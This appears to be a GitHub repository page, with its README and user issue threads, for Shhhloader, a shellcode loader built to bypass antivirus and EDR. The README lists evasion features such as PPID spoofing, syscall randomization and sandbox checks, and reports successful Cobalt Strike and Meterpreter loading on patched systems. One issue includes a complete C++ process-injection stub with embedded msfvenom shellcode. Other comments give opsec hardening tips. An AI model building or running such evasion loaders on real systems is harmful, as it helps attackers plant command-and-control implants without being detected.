SysWhispers Shellcode Loader

Overview

Shhhloader

Shhhloader is a SysWhispers Shellcode Loader that is currently a Work in Progress. It takes raw shellcode as input and compiles a C++ stub that has been integrated with SysWhispers in order to bypass AV/EDR. The included python builder will work on any Linux system that has Mingw-w64 installed.

The tool has been confirmed to successfully load Meterpreter and a Cobalt Strike beacon on fully updated systems with Windows Defender enabled. The project itself is still in a PoC/WIP state, as it currently doesn't work with all payloads.

2/9/22 EDIT: Shhhloader now includes 5 different ways to execute your shellcode! See below for updated usage. Big thanks to @Snovvcrash and their DInjector project for inspiration! I highly recommend taking a look at it for more information regarding the shellcode injection techniques and code that this tool is now based on.

┳┻|
┻┳|
┳┻|
┻┳|
┳┻| _
┻┳| •.•)  - Shhhhh, AV might hear us! 
┳┻|⊂ノ   
┻┳|
usage: Shhhloader.py [-h] [-p explorer.exe] [-m QueueUserAPC] [-nr] [-v] [-d] [-o a.exe] file

ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER

positional arguments:
  file                  File containing raw shellcode

optional arguments:
  -h, --help            show this help message and exit
  -p explorer.exe, --process explorer.exe
                        Process to inject into (Default: explorer.exe)
  -m QueueUserAPC, --method QueueUserAPC
                        Method for shellcode execution (Options: ProcessHollow, QueueUserAPC,
                        RemoteThreadContext, RemoteThreadSuspended, CurrentThread) (Default: QueueUserAPC)
  -nr, --no-randomize   Disable syscall name randomization
  -v, --verbose         Enable debugging messages upon execution
  -d, --dll-sandbox     Use DLL based sandbox checks instead of the standard ones
  -o a.exe, --outfile a.exe
                        Name of compiled file

Video Demo: https://www.youtube.com/watch?v=-KLGV_aGYbw

Features:

  • 5 Different Shellcode Execution Methods (ProcessHollow, QueueUserAPC, RemoteThreadContext, RemoteThreadSuspended, CurrentThread)
  • PPID Spoofing
  • Block 3rd Party DLLs
  • Syscall Name Randomization
  • XOR Encryption with Dynamic Key Generation
  • Sandbox Evasion via Loaded DLL Enumeration
  • Sandbox Evasion via Checking Processors, Memory, and Time

Tested and Confirmed Working on:

  • Windows 10 21H1 (10.0.19043)
  • Windows 10 20H2 (10.0.19042)
  • Windows Server 2019 (10.0.17763)

Scan Results as of 2/9/22 (x64 Meterpreter QueueUserAPC): https://antiscan.me/scan/new/result?id=tntuLnCkTCwz

Greetz & Credit:

Comments
  • Error FAILED to allocate memory in the current process, exiting: c000000d

    Hey. For me only ProcessHollow works as shellcode execution method.

    For all the other methods I receive an error while running the generated exe.

    Generating:

    python Shhhloader.py  -p notepad.exe    Payload.raw   -v
    
    ┳┻|
    ┻┳|
    ┳┻|
    ┻┳|
    ┳┻| _
    ┻┳| •.•)  - Shhhhh, AV might hear us!
    ┳┻|⊂ノ
    ┻┳|
    [+] ICYGUIDER'S CUSTOM SYSWHISPERS SHELLCODE LOADER
    [+] Using notepad.exe for QueueUserAPC injection
    [+] Randomizing syscall names
    [+] Verbose messages enabled
    [+] Saved new stub to stub.cpp
    [+] Compiling new stub...
    [!] a.exe has been compiled successfully!
    

    Running:

    Please wait 60 seconds...
    Sandbox checks passed
    hiqPjIRXkVUORsAylux FAILED to allocate memory in the current process, exiting: c000000d
    

    :-(

    Injecting in explorer.exe or notepad.exe doesn't make a difference.

    Edit:

    I traced it down to syscall to NtAllocateVirtualMemory. The return value is:

    RAX 00000000C000000D STATUS_INVALID_PARAMETER

    Please help!

    opened by hawaii67 5
  • CurrentThread

    hi

    So I managed to only get a Cobalt beacon back when using the CurrentThread method. I am not sure why the other methods are not working. If you can explain the steps to help you debug it, I will be happy to assist.

    OS Name: Microsoft Windows 10 Enterprise
    OS Version: 10.0.18363 N/A Build 18363

    opened by faheemadam 5
  • GetSyscallStub not working

    Hi. I'm trying a Cobalt Strike (4.7) x64 stageless shellcode, and facing some issues against a Win10 machine with:

    • GetSyscallStub option. When used, I get no beacon
    • EnumDisplayMonitors or ModuleStomping options. When used, I get no beacon

    The only option that works for me is using the default 'QueueUserAPC' without GetSyscallStub. Are you aware of these limitations, or am I doing something wrong? My AV is disabled for test purposes and I don't have any EDR either.

    Thanks

    opened by qgrosperrin 3
  • llvm obfuscator cause error when compiling!

    First Thanks for your amazing work!

    The previous version was working fine, but after the update it started to go wrong. I compiled the LLVM following your installation tutorial! I tested whether there was something wrong with the LLVM binaries, but everything was normal: they compile other .cpp files correctly.

    I am available to send any data or additional information.

    opened by T1Cr4azy 2
  • Unable to execute Mimikatz's shellcode

    Hi, I've played around with the tool since its first release and I really must say that you and your contributors have done a really great job. The tool works fine with CS/Metasploit shellcodes, however it doesn't work with Mimikatz's shellcode (generated from Donut). It does compile successfully, but there is no output displayed when executed (no crashes at all, just no output). I've seen this type of behaviour on other tools as well, maybe it is because of the generated shellcode itself as it is 1.4 million bytes long 🤔

    Looking forward to your answer :)

    opened by kleiton0x00 2
  • x86_64-w64-mingw32-clang++: not found

    [+] ICYGUIDER'S CUSTOM SYSCALL SHELLCODE LOADER
    [+] Storing shellcode as english word list
    [+] Using c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe for ModuleStomping
    [+] Using GetSyscallStub for syscalls
    [+] Using domain enumeration for sandbox evasion
    [+] Generating DLL instead of exe
    [+] Randomizing syscall names
    [+] Saved new stub to stub.cpp
    [+] Compiling new stub...
    [+] Using Obfuscator-LLVM to compile stub...
    sh: 1: x86_64-w64-mingw32-clang++: not found
    [!] Stub compilation failed! Something went wrong!

    Any suggestions?

    opened by MrAnderson0x1 2
  • OLLVM Errors

    Hey man,

    Getting some OLLVM errors, wonder if you have any tips?

    [+] Using Obfuscator-LLVM to compile stub...
    In file included from stub.cpp:4:
    In file included from /usr/x86_64-w64-mingw32/include/windows.h:69:
    In file included from /usr/x86_64-w64-mingw32/include/windef.h:9:
    In file included from /usr/x86_64-w64-mingw32/include/minwindef.h:163:
    In file included from /usr/x86_64-w64-mingw32/include/winnt.h:1555:
    In file included from /usr/bin/../lib/clang/14.0.6/include/x86intrin.h:15:
    In file included from /usr/bin/../lib/clang/14.0.6/include/immintrin.h:26:
    In file included from /usr/bin/../lib/clang/14.0.6/include/xmmintrin.h:3009:
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2378:19: error: use of undeclared identifier '__builtin_elementwise_max'
      return (__m128i)__builtin_elementwise_max((__v8hi)__a, (__v8hi)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2398:19: error: use of undeclared identifier '__builtin_elementwise_max'
      return (__m128i)__builtin_elementwise_max((__v16qu)__a, (__v16qu)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2418:19: error: use of undeclared identifier '__builtin_elementwise_min'
      return (__m128i)__builtin_elementwise_min((__v8hi)__a, (__v8hi)__b);
                      ^
    /usr/bin/../lib/clang/14.0.6/include/emmintrin.h:2438:19: error: use of undeclared identifier '__builtin_elementwise_min'
      return (__m128i)__builtin_elementwise_min((__v16qu)__a, (__v16qu)__b);
    

    Thanks!

    opened by vysecurity 2
  • python2 conversion

    Hi there! I am running your script in a py2 environment, in which I had to change the following line into this:

    test = ''.join(chr(ord(test) ^ ord(key[i])))
    

    which breaks everything. Do you have any opinion on this? Cheers!

    opened by miralayipouya 1
  • Recommendations

    Strip debug information from the binary for opsec and size reduction: x86_64-w64-mingw32-strip --strip-all

    Add skCrypter.h headers and wrap the key with skCrypt("key") so that it is not a plaintext string: https://github.com/skadro-official/skCrypter

    opened by rotarydrone 1
  • msfvenom alternatives [question]

    Hi @icyguider ! hope you are doing well. I am re-creating a tool like msfvenom using python, and in the process I am dealing with some problems related to the design complexity of msfvenom. Do you have any suggestion for me on open-source stuff which would help me achieve such a task? I have already seen projects such as Veil or OWASP ZSC, but these tools are not active any more. Cheers!

    opened by miralayipouya 1
  • win7 sp1 or windows server 2008 Test failed can you help me?

    • os: Windows 7 sp 1
    //generate payload
    msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o calc.bin
    //source code
    
    #define _WIN32_WINNT 0x0600
    #include <iostream>
    #include <windows.h>
    #include <psapi.h>
    #include <winternl.h>
    #include <tlhelp32.h>
    #include "Syscalls2.h"
    #ifndef UNICODE  
    typedef std::string String;
    #else
    typedef std::wstring String;
    #endif
    
    
    unsigned char shellcode[276] = {
    0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC0,0x00,
    0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
    0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,
    0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,
    0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,
    0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,
    0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,
    0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,
    0x42,0x3C,0x48,0x01,0xD0,0x8B,0x80,0x88,
    0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,
    0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,
    0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,
    0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
    0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,
    0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
    0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,
    0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,
    0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,
    0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,
    0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,
    0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,
    0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,
    0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,
    0x59,0x5A,0x48,0x8B,0x12,0xE9,0x57,0xFF,
    0xFF,0xFF,0x5D,0x48,0xBA,0x01,0x00,0x00,
    0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x8D,
    0x01,0x01,0x00,0x00,0x41,0xBA,0x31,0x8B,
    0x6F,0x87,0xFF,0xD5,0xBB,0xF0,0xB5,0xA2,
    0x56,0x41,0xBA,0xA6,0x95,0xBD,0x9D,0xFF,
    0xD5,0x48,0x83,0xC4,0x28,0x3C,0x06,0x7C,
    0x0A,0x80,0xFB,0xE0,0x75,0x05,0xBB,0x47,
    0x13,0x72,0x6F,0x6A,0x00,0x59,0x41,0x89,
    0xDA,0xFF,0xD5,0x63,0x61,0x6C,0x63,0x2E,
    0x65,0x78,0x65,0x00,
    };
    
    int main()
    {
        
        HANDLE hProc = GetCurrentProcess();
        DWORD oldprotect = 0;
        PVOID base_addr = NULL;
        HANDLE thandle = NULL;
        SIZE_T bytesWritten;
        size_t shellcodeSize = sizeof(shellcode) / sizeof(shellcode[0])+1;
        NTSTATUS res = NtAllocateVirtualMemory(hProc, &base_addr, 0, (PSIZE_T)&shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (res != 0){
            std::cout << "NtAllocateVirtualMemory FAILED to allocate memory in the current process, exiting: " << std::hex << res << std::endl;
            return 0;
        }
        else {
            std::cout << "NtAllocateVirtualMemory allocated memory in the current process sucessfully." << std::endl;
        }
        res = NtWriteVirtualMemory(hProc, base_addr, shellcode, shellcodeSize, &bytesWritten);
        if (res != 0){
            std::cout << "NtWriteVirtualMemory FAILED to write decoded payload to allocated memory: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtWriteVirtualMemory wrote decoded payload to allocated memory successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_NOACCESS, &oldprotect);
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtCreateThreadEx(&thandle, GENERIC_EXECUTE, NULL, hProc, base_addr, NULL, TRUE, 0, 0, 0, NULL);
    
        if (res != 0){
            std::cout << "NtCreateThreadEx FAILED to create thread in current process: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtCreateThreadEx created thread in current process successfully." << std::endl;
        }
        res = NtProtectVirtualMemory(hProc, &base_addr, (PSIZE_T)&shellcodeSize, PAGE_EXECUTE_READ, &oldprotect);
    
        if (res != 0){
            std::cout << "NtProtectVirtualMemory FAILED to modify permissions: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtProtectVirtualMemory modified permissions successfully." << std::endl;
        }
        res = NtResumeThread(thandle, 0);
        if (res != 0){
            std::cout << "NtResumeThread FAILED to resume created thread: " << std::hex << res << std::endl;
            return 0;
        }
        else{
            std::cout << "NtResumeThread resumed created thread successfully." << std::endl;
        }
        res = NtWaitForSingleObject(thandle, -1, NULL);   
    }
    //build
    x86_64-w64-mingw32-g++ stub.cpp -w -masm=intel -fpermissive -static -lpsapi -Wl,--subsystem,console -o a.exe
    

    The test is successful in win7 and above

    The output of win7 or windows 2008 is as follows

    NtAllocateVirtualMemory allocated memory in the current process sucessfully.
    NtWriteVirtualMemory wrote decoded payload to allocated memory successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtCreateThreadEx created thread in current process successfully.
    NtProtectVirtualMemory modified permissions successfully.
    NtResumeThread FAILED to resume created thread: c0000022
    
    opened by zhihuba 0
Owner: icyguider